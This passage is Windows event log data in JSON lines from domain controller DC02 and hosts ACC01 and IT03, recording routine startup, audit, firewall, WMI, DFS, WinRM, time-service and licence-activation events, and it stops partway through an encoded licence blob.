{"EventTime":"2021-09-21T13:03:28.056374+05:45","Hostname":"DC02.prod.corp.local","Keywords":"2305843009213693952","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":50036,"SourceName":"Microsoft-Windows-Dhcp-Client","ProviderGuid":"{15A7A4F8-0072-4EAB-ABAD-F98A4D666AED}","Version":0,"TaskValue":4,"OpcodeValue":68,"RecordNumber":170010,"ExecutionProcessID":1144,"ExecutionThreadID":1200,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"DHCPv4 client service is started","Category":"Service State Event","Opcode":"ServiceStart","EventReceivedTime":"2021-09-21T13:03:49.732832+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:02:59.250842+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4696,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13312,"OpcodeValue":0,"RecordNumber":3555505,"ExecutionProcessID":4,"ExecutionThreadID":32,"Channel":"Security","Message":"A primary token was assigned to process.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x3E7\r\n\r\nProcess Information:\r\n\tProcess ID:\t0x4\r\n\tProcess Name:\t\r\n\r\nTarget Process:\r\n\tTarget Process ID:\t0x58\r\n\tTarget Process Name:\tRegistry\r\n\r\nNew Token Information:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x3E7","Category":"Process Creation","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-0-0","TargetUserName":"-","TargetDomainName":"-","TargetLogonId":"0x3e7","TargetProcessId":"0x58","TargetProcessName":"Registry","ProcessId":"0x4","EventReceivedTime":"2021-09-21T13:03:48.111868+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:28.291962+05:45","Hostname":"DC02.prod.corp.local","Keywords":"2305843009213693952","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":51046,"SourceName":"Microsoft-Windows-DHCPv6-Client","ProviderGuid":"{6A1F2B00-6A90-4C38-95A5-5CAB3B056778}","Version":0,"TaskValue":4,"OpcodeValue":62,"RecordNumber":170013,"ExecutionProcessID":1144,"ExecutionThreadID":1300,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"DHCPv6 client service is started","Category":"Service State Event","Opcode":"ServiceStart","EventReceivedTime":"2021-09-21T13:03:49.732832+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:17.139092+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4608,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12288,"OpcodeValue":0,"RecordNumber":3555517,"ExecutionProcessID":628,"ExecutionThreadID":632,"Channel":"Security","Message":"Windows is starting up.\r\n\r\nThis event is logged when LSASS.EXE starts and the auditing subsystem is initialized.","Category":"Security State Change","Opcode":"Info","EventReceivedTime":"2021-09-21T13:03:48.216339+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:19.274697+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4902,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13568,"OpcodeValue":0,"RecordNumber":3555533,"ExecutionProcessID":628,"ExecutionThreadID":688,"Channel":"Security","Message":"The Per-user audit policy table was created.\r\n\r\nNumber of Elements:\t0\r\nPolicy ID:\t0x990A","Category":"Audit Policy Change","Opcode":"Info","PuaCount":"0","PuaPolicyId":"0x990a","EventReceivedTime":"2021-09-21T13:03:48.261636+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:39.592040+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4944,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13571,"OpcodeValue":0,"RecordNumber":876622,"ActivityID":"{63A5CF36-AEB8-0000-A6CF-A563B8AED701}","ExecutionProcessID":672,"ExecutionThreadID":728,"Channel":"Security","Message":"The following policy was active when the Windows Firewall started.\r\n\r\nGroup Policy Applied:\tNo\r\nProfile Used:\tPublic\r\nOperational mode:\tOn\r\nAllow Remote Administration:\tDisabled\r\nAllow Unicast Responses to Multicast/Broadcast Traffic:\tEnabled\r\nSecurity Logging:\r\n\tLog Dropped Packets:\tDisabled\r\n\tLog Successful Connections:\tDisabled","Category":"MPSSVC Rule-Level Policy Change","Opcode":"Info","GroupPolicyApplied":"No","Profile":"Public","OperationMode":"On","RemoteAdminEnabled":"Disabled","MulticastFlowsEnabled":"Enabled","LogDroppedPacketsEnabled":"Disabled","LogSuccessfulConnectionsEnabled":"Disabled","EventReceivedTime":"2021-09-21T13:03:42.669033+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:39.654252+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5024,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12292,"OpcodeValue":0,"RecordNumber":877084,"ActivityID":"{63A5CF36-AEB8-0000-A6CF-A563B8AED701}","ExecutionProcessID":672,"ExecutionThreadID":728,"Channel":"Security","Message":"The Windows Firewall service started successfully.","Category":"Other System Events","Opcode":"Info","EventReceivedTime":"2021-09-21T13:03:42.997164+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:39.905672+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4956,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13571,"OpcodeValue":0,"RecordNumber":877106,"ActivityID":"{63A5CF36-AEB8-0000-A6CF-A563B8AED701}","ExecutionProcessID":672,"ExecutionThreadID":748,"Channel":"Security","Message":"Windows Firewall changed the active profile.\r\n\r\nNew Active Profile:\tPrivate","Category":"MPSSVC Rule-Level Policy Change","Opcode":"Info","ActiveProfile":"Private","EventReceivedTime":"2021-09-21T13:03:43.012785+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T15:15:36.981638+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9223372036854775808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":129,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":56206,"ExecutionProcessID":1212,"ExecutionThreadID":1372,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"NtpClient was unable to set a domain peer to use as a time source because of discovery error. NtpClient will try again in 30 minutes and double the reattempt interval thereafter. The error was: The entry is not found. (0x800706E1)","Opcode":"Info","EventData.Name":"TMP_EVENT_DOMAIN_PEER_DISCOVERY_ERROR","ErrorMessage":"The entry is not found. (0x800706E1)","RetryMinutes":"30","EventReceivedTime":"2021-09-21T15:15:38.088923+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:47.422542+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5617,"SourceName":"Microsoft-Windows-WMI","ProviderGuid":"{1EDEEE53-0AFE-4609-B846-D8C0B2075B1F}","Version":2,"TaskValue":0,"OpcodeValue":0,"RecordNumber":153453,"ExecutionProcessID":540,"ExecutionThreadID":2704,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Windows Management Instrumentation Service subsystems initialized successfully","Opcode":"Info","EventReceivedTime":"2021-09-21T13:03:49.215911+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:47.690653+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5859,"SourceName":"Microsoft-Windows-WMI-Activity","ProviderGuid":"{1418EF04-B0B4-4623-BF7E-D74AB47BBDAA}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":9834,"ActivityID":"{63A5CF36-AEB8-0000-86D3-A563B8AED701}","ExecutionProcessID":540,"ExecutionThreadID":4220,"Channel":"Microsoft-Windows-WMI-Activity/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Namespace = //./root/CIMV2; NotificationQuery = select * from MSFT_SCMEventLogEvent; OwnerName = S-1-5-32-544; HostProcessID = 540;  Provider= SCM Event Provider, queryID = 0; PossibleCause = Permanent","Opcode":"Info","Operation_EssStarted.NamespaceName":"//./root/CIMV2","Operation_EssStarted.Query":"select * from MSFT_SCMEventLogEvent","Operation_EssStarted.User":"S-1-5-32-544","Operation_EssStarted.Processid":"540","Operation_EssStarted.Provider":"SCM Event Provider","Operation_EssStarted.queryid":"0","Operation_EssStarted.PossibleCause":"Permanent","EventReceivedTime":"2021-09-21T13:03:49.215911+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:47.664910+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5861,"SourceName":"Microsoft-Windows-WMI-Activity","ProviderGuid":"{1418EF04-B0B4-4623-BF7E-D74AB47BBDAA}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":9832,"ExecutionProcessID":540,"ExecutionThreadID":4220,"Channel":"Microsoft-Windows-WMI-Activity/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Namespace = //./root/subscription; Eventfilter = SCM Event Log Filter (refer to its activate eventid:5859); Consumer = NTEventLogEventConsumer=\"SCM Event Log Consumer\"; PossibleCause = Binding EventFilter: \ninstance of __EventFilter\n{\n\tCreatorSID = {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0};\n\tEventNamespace = \"root\\\\cimv2\";\n\tName = \"SCM Event Log Filter\";\n\tQuery = \"select * from MSFT_SCMEventLogEvent\";\n\tQueryLanguage = \"WQL\";\n};\nPerm. Consumer: \ninstance of NTEventLogEventConsumer\n{\n\tCategory = 0;\n\tCreatorSID = {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0};\n\tEventType = 1;\n\tName = \"SCM Event Log Consumer\";\n\tNameOfUserSIDProperty = \"sid\";\n\tSourceName = \"Service Control Manager\";\n};\n","Opcode":"Info","Operation_ESStoConsumerBinding.Namespace":"//./root/subscription","Operation_ESStoConsumerBinding.ESS":"SCM Event Log Filter","Operation_ESStoConsumerBinding.CONSUMER":"NTEventLogEventConsumer=\"SCM Event Log Consumer\"","Operation_ESStoConsumerBinding.PossibleCause":"Binding EventFilter: \ninstance of __EventFilter\n{\n\tCreatorSID = {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0};\n\tEventNamespace = \"root\\\\cimv2\";\n\tName = \"SCM Event Log Filter\";\n\tQuery = \"select * from MSFT_SCMEventLogEvent\";\n\tQueryLanguage = \"WQL\";\n};\nPerm. Consumer: \ninstance of NTEventLogEventConsumer\n{\n\tCategory = 0;\n\tCreatorSID = {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0};\n\tEventType = 1;\n\tName = \"SCM Event Log Consumer\";\n\tNameOfUserSIDProperty = \"sid\";\n\tSourceName = \"Service Control Manager\";\n};\n","EventReceivedTime":"2021-09-21T13:03:49.215911+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:41.777258+05:45","Hostname":"DC02.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":14531,"SourceName":"Microsoft-Windows-DfsSvc","ProviderGuid":"{7DA4FE0E-FD42-4708-9AA5-89B77A224885}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":170057,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"DFS server has finished initializing.","EventData.Name":"DfsFinishInit","EventReceivedTime":"2021-09-21T13:03:50.767600+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:41.574184+05:45","Hostname":"DC02.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":14533,"SourceName":"Microsoft-Windows-DfsSvc","ProviderGuid":"{7DA4FE0E-FD42-4708-9AA5-89B77A224885}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":170056,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"DFS has finished building all namespaces.","EventData.Name":"DfsFinishBuildingNamespace","EventReceivedTime":"2021-09-21T13:03:50.767600+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:43.636633+05:45","Hostname":"DC02.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10148,"SourceName":"Microsoft-Windows-WinRM","ProviderGuid":"{A7975C8F-AC13-49F1-87DA-5A984A4AB417}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":170064,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"The WinRM service is listening for WS-Management requests. \r\n\r\n User Action \r\n Use the following command to see the specific IPs on which WinRM is listening: \r\n\r\n winrm enumerate winrm/config/listener","Opcode":"Info","EventData.Name":"Started Listening","EventReceivedTime":"2021-09-21T13:03:50.873269+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:52.430836+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4724,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13824,"OpcodeValue":0,"RecordNumber":3556112,"ExecutionProcessID":628,"ExecutionThreadID":4432,"Channel":"Security","Message":"An attempt was made to reset an account's password.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tDC02$\r\n\tAccount Domain:\t\tPROD\r\n\tLogon ID:\t\t0x3E7\r\n\r\nTarget Account:\r\n\tSecurity ID:\t\tS-1-5-21-1665892435-703704035-3405442920-1103\r\n\tAccount Name:\t\tCORP$\r\n\tAccount Domain:\t\tPROD","Category":"User Account Management","Opcode":"Info","TargetUserName":"CORP$","TargetDomainName":"PROD","TargetSid":"S-1-5-21-1665892435-703704035-3405442920-1103","SubjectUserSid":"S-1-5-18","SubjectUserName":"DC02$","SubjectDomainName":"PROD","SubjectLogonId":"0x3e7","EventReceivedTime":"2021-09-21T13:03:54.339755+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:52.581519+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4716,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13569,"OpcodeValue":0,"RecordNumber":3556116,"ExecutionProcessID":628,"ExecutionThreadID":4432,"Channel":"Security","Message":"Trusted domain information was modified.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-7\r\n\tAccount Name:\t\tANONYMOUS LOGON\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E6\r\n\r\nTrusted Domain:\r\n\tDomain Name:\t\t-\r\n\tDomain ID:\t\tS-1-5-21-2569713578-3403938347-3732993993\r\n\r\nNew Trust Information:\r\n\tTrust Type:\t\t2\r\n\tTrust Direction:\t\t3\r\n\tTrust Attributes:\t\t32\r\n\tSID Filtering:\t\t-","Category":"Authentication Policy Change","Opcode":"Info","SubjectUserSid":"S-1-5-7","SubjectUserName":"ANONYMOUS LOGON","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e6","DomainName":"-","DomainSid":"S-1-5-21-2569713578-3403938347-3732993993","TdoType":"2","TdoDirection":"3","TdoAttributes":"32","SidFilteringEnabled":"-","EventReceivedTime":"2021-09-21T13:03:54.371008+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:52.157746+05:45","Hostname":"DC02.prod.corp.local","Keywords":"36028797018963968","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":10154,"SourceName":"Microsoft-Windows-WinRM","ProviderGuid":"{A7975C8F-AC13-49F1-87DA-5A984A4AB417}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":170078,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"The WinRM service failed to create the following SPNs: WSMAN/DC02.prod.corp.local; WSMAN/DC02. \r\n\r\n Additional Data \r\n The error received was 1355: %%1355.\r\n\r\n User Action \r\n The SPNs can be created by an administrator using setspn.exe utility.","Opcode":"Info","spn1":"WSMAN/DC02.prod.corp.local","spn2":"WSMAN/DC02","error":"1355","EventReceivedTime":"2021-09-21T13:03:53.285783+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T20:52:58.298621+05:45","Hostname":"IT03.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":37,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":108984,"ExecutionProcessID":912,"ExecutionThreadID":1288,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time provider NtpClient is currently receiving valid time data from DC01.corp.local (ntp.d|0.0.0.0:123->192.168.2.47:123).","Opcode":"Info","TimeSource":"DC01.corp.local (ntp.d|0.0.0.0:123-&gt;192.168.2.47:123)","EventReceivedTime":"2021-09-21T20:52:59.495977+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:04:05.497497+05:45","Hostname":"DC02.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5792,"SourceName":"NETLOGON","TaskValue":0,"RecordNumber":170094,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"Site 'MAIN' does not have any LDAP servers for non-domain NC 'DomainDnsZones.prod.corp.local'. LDAP servers in site 'PROD' have been automatically selected to cover site 'MAIN' for non-domain NC 'DomainDnsZones.prod.corp.local' based on configured Directory Server replication costs.","Opcode":"Info","Data":"PROD","Data_1":"MAIN","Data_2":"DomainDnsZones.prod.corp.local","EventReceivedTime":"2021-09-21T13:04:06.528261+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:04:05.451272+05:45","Hostname":"DC02.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5784,"SourceName":"NETLOGON","TaskValue":0,"RecordNumber":170093,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"Site 'MAIN' does not have any Domain Controllers for domain 'PROD'. Domain Controllers in site 'PROD' have been automatically selected to cover site 'MAIN' for domain 'PROD' based on configured Directory Server replication costs.","Opcode":"Info","Data":"PROD","Data_1":"MAIN","Data_2":"PROD","EventReceivedTime":"2021-09-21T13:04:06.528261+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:04:15.184188+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":139,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":170097,"ExecutionProcessID":1044,"ExecutionThreadID":4192,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time service has started advertising as a time source.","Opcode":"Info","EventData.Name":"TMP_EVENT_START_ADVERTISING","EventReceivedTime":"2021-09-21T13:04:16.247159+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:04:24.795379+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5136,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":14081,"OpcodeValue":0,"RecordNumber":3556241,"ExecutionProcessID":628,"ExecutionThreadID":736,"Channel":"Security","Message":"A directory service object was modified.\r\n\t\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x62956\r\n\r\nDirectory Service:\r\n\tName:\tprod.corp.local\r\n\tType:\tActive Directory Domain Services\r\n\t\r\nObject:\r\n\tDN:\tCN=DC02,OU=Domain Controllers,DC=prod,DC=CORP,DC=local\r\n\tGUID:\t{66cb3374-4b66-4fce-9e64-8202e19faa45}\r\n\tClass:\tcomputer\r\n\t\r\nAttribute:\r\n\tLDAP Display Name:\tservicePrincipalName\r\n\tSyntax (OID):\t2.5.5.12\r\n\tValue:\tTERMSRV/DC02.prod.corp.local\r\n\t\r\nOperation:\r\n\tType:\tValue Added\r\n\tCorrelation ID:\t{1075208c-8a0e-4290-8c46-48e77af9d933}\r\n\tApplication Correlation ID:\t-","Category":"Directory Service Changes","Opcode":"Info","OpCorrelationID":"{1075208c-8a0e-4290-8c46-48e77af9d933}","AppCorrelationID":"-","SubjectUserSid":"S-1-5-18","SubjectUserName":"SYSTEM","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x62956","DSName":"prod.corp.local","DSType":"%%14676","ObjectDN":"CN=DC02,OU=Domain Controllers,DC=prod,DC=CORP,DC=local","ObjectGUID":"{66cb3374-4b66-4fce-9e64-8202e19faa45}","ObjectClass":"computer","AttributeLDAPDisplayName":"servicePrincipalName","AttributeSyntaxOID":"2.5.5.12","AttributeValue":"TERMSRV/DC02.prod.corp.local","OperationType":"%%14674","EventReceivedTime":"2021-09-21T13:04:25.606632+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:08:52.869680+05:45","Hostname":"DC02.prod.corp.local","Keywords":"36028797018963968","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":8200,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":109868,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"License acquisition failure details. \r\nhr=0x80072F8F","Data":"hr=0x80072F8F","Data_1":"00010001(0x00000000, 13:08:51:751 - https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail)\n00020001(0x00000000, 13:08:51:767)\n00030001(0x00000000, 13:08:51:767 - https://activation-v2.sls.microsoft.com)\n00030002(0x00000000, 13:08:51:767 - 0)\n00040001(0x00000000, 13:08:51:767 - https://activation-v2.sls.microsoft.com)\n00040002(0x00000000, 13:08:51:767 - 1, <NULL>, <NULL>, <NULL>)\n00050002(0x80072F94, 13:08:51:767 - 0, 1)\n00040006(0x00000001, 13:08:51:767 - 0, https://activation-v2.sls.microsoft.com, <N/A>, <N/A>)\n00020005(0x00000000, 13:08:51:767 - 0)\n00020008(0x80072F8F, 13:08:52:854 - SOAPAction: \"http://microsoft.com/SL/ProductActivationService/IssueToken\"\nContent-Type: text/xml; charset=utf-8\n, <soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soapenc=\"http://schemas.xmlsoap.org/soap/encoding/\"><soap:Body><RequestSecurityToken xmlns=\"http://schemas.xmlsoap.org/ws/2004/04/security/trust\"><TokenType>ProductActivation</TokenType><RequestType>http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue</RequestType><UseKey><Values xmlns:q1=\"http://schemas.xmlsoap.org/ws/2004/04/security/trust\" soapenc:arrayType=\"q1:TokenEntry[1]\"><TokenEntry><Name>PublishLicense</Name><Value>03J8iHDLTxUwVZex89ealgnsaEcKKxOaUE7MwYkJSsMKIFWg8jB3cofWEch0zclV536LE28S9of7ugbq/n5j48q/A9bRMcbv1InXrQcn+KlKCz1alwC0DyBfUatLfqxWpw3DRfJBRuCNYss9bYi4rBcNEcoQScb09th6HMWZpPdkiJEk9JoehPnvTUzz04hPy8j44CdxSY+Q1vSA6SSeh8KyMpLyl7nNNrrCPzxGk2ecjiDaH/DObl7V5LOc39UhDttfqw2VLn5YKTme1iYG4nfj7pl/vquNy5uq3HAKhzZEst1UZBIqoJtS8f6v/wM+k9ZnG/jDnurHeTz9+P9DjFFYvBqgW1fO8CGh2L2VNHeRiXHh4OvanfbaJXEIFWuicqKhRBIFwTMAUxjDnxXB85qjaX5ua2WuAG7f28IZsVLQ0DGlgfvzkPwNvkqpAu7T74b9BbYuyVwvchM5NcatZhslGPrXZ3i3iyusWVCNMRk4ErPRungjbjXkR2jv8Y94wVZoev15si9FL0PgAonH7pjoBf8uM94PyjtmtYJqus1PEAosu7FLgCuSy38XSM4vU8SzzGm/mlkpESdjh4H0ZmBuxS6WkVlHB4soR3pqyXwPAIMybFS99j0Q9YUOtEfNx5C1zn81FGeNtptOPw58ZguIrt29lVhg5LKLpxl36GNBU9w1hheHkZqXuYrhJQnmPOvs3m1aoJr2d0PpooGflOIwk6tRbmTtLcufE3Ns8oKloUSZ04JZ0EMFB2I2eS+4oDbzDyHadPEK1fcO4MLq5+wOUtWAG7iKduFteLGNS7yWopT3e6D0xrcsXelEcYFoj0irX9pBlSU4YhqW/7fO43K3GSQIH5cc1lsQW5m6jykKnW1L44bjB76pHFnwt466ZdS3zFNMeAjeA4JHtOJ7kODqpW8rOZ90u8T02c9rNzWqib3l+m7E8qDTMvDJOQSb5s/A96dhEvjzTnMNovoPpBiFKNxMQsvirugOpz7Ryb2gC1HCM0amrh/ZDYHkGmWnJZwoWD608W1fDnDUNoZf2GL4I03AjKanFrf4+sBtjG9eOtXUd9xaenDAgD4UmGcCYl+YzgaWnIDYjJQeLvIvbW7KgTqq5K2INKW6hHhA9nQEo2WM8sXM7Zg7mUhMaCfNcUmOjoNPA1Sv3yfh5OY/+bKlUJqeFI100CifyLkbW2cv6wwRwVu9+A2X0ea7Lu0P7XMkMFHOgcZhVK6g2iWhzwBwZ9vDosPrLPixwxQBbPjrN89Yn+m2lDR8hNSGiKHy3VmXG6MyJFiybq4Fy/MIKDYsRRR0H0SweTIQSyXGe978Nyw+yQQ5zkJ/cotI/4Rgrx54UKqbnGIfHTc4m3ndLJyGisTwkkUjxENaNDjYHp2c3jnlpGKR+sbOveFB3H0pA8orae1DtvN8KSyO0qwIl8lVvVfRczIKGUpekXE3Cvs/ew+u7EzlYD3j7POi5L4XZHOmQAfHf//8DpkSfE7O7y5qKwKyALJIBDt2ik5U1rZ00h8ZbtyoZKzkAJmePGhCGLN/uZnxL1QFABbLjoybCEEALWBG85VWIlayg8FvWTGemBdfW2j6tvXUo8/c/wCjeyokjSCasgr5mg1Hh4ySF196YJexHsC4d8F64yDnL6O++XbzrWz9MZqjC7ZzaEDolXfaDepfcIqSPqZoMdgRcUKZSKvcFmf2/